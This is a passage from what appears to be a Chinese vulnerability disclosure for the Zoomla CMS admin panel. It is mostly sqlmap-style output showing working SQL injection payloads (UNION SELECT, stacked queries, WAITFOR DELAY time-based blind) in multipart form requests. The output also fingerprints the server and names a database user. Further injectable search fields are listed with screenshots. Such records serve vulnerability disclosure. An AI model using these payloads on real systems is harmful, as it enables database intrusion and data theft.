d2DzwrAAwDBhUBAklEBxQrAAoUKwABAiEUKwABAiIUKwABAiMUKwABAiQUKwABAiUUKwABAiYUKwABAicUKwABAigUKwABAikUKwABAioIAgRkmIUN+QajY8XCYHl94YGf479+Juhbv5otzNBlCeQ9aRk= ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$txtTitle" 123456%' UNION ALL SELECT CHAR(113)+CHAR(114)+CHAR(121)+CHAR(105)+CHAR(113)+CHAR(100)+CHAR(87)+CHAR(122)+CHAR(70)+CHAR(88)+CHAR(112)+CHAR(69)+CHAR(101)+CHAR(77)+CHAR(72)+CHAR(113)+CHAR(117)+CHAR(121)+CHAR(105)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$txtTime" 2014-08 ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$btnSeach" ??�������� ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06" 10 ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07" 1 ------WebKitFormBoundary5n6dB9dFzpkAYygr-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__EVENTTARGET" ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__EVENTARGUMENT" ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__LASTFOCUS" ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__VIEWSTATE" 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 ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$txtTitle" 123456%'; WAITFOR DELAY '0:0:5'-- ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$txtTime" 2014-08 ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$btnSeach" ??�������� ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06" 10 ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07" 1 ------WebKitFormBoundary5n6dB9dFzpkAYygr-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__EVENTTARGET" ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__EVENTARGUMENT" ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__LASTFOCUS" ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="__VIEWSTATE" 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 ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$txtTitle" 123456%' WAITFOR DELAY '0:0:5'-- ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$txtTime" 2014-08 ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$btnSeach" ??�������� ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06" 10 ------WebKitFormBoundary5n6dB9dFzpkAYygr Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07" 1 ------WebKitFormBoundary5n6dB9dFzpkAYygr-- --- web server operating system: Windows 8.1 or 2012 R2 web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.5 back-end DBMS: Microsoft SQL Server 2008 current user: 'demozoomla_f' ```

c.商城管理的明细记录处:

<img src="https://images.seebug.org/upload/201408/041341579bf95dd8b1e7efe9cc884ae21ccf64f3.jpg" alt="zoomla1.jpg" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201408/04134305443949b94a41607d5750016671646398.jpg" alt="zoomla2.jpg" width="600" onerror="javascript:errimg(this);">

d.企业黄页的黄页内容管理的搜索处

<img src="https://images.seebug.org/upload/201408/04134437b7465ce20022e0aca8f9fc5111e3d78b.jpg" alt="zoomla1.jpg" width="600" onerror="javascript:errimg(this);">

e.企业黄页的黄页标签管理的搜索处

<img src="https://images.seebug.org/upload/201408/041346325abd131ea8b72820be407828673e3b4b.jpg" alt="zoomla1.jpg" width="600" onerror="javascript:errimg(this);">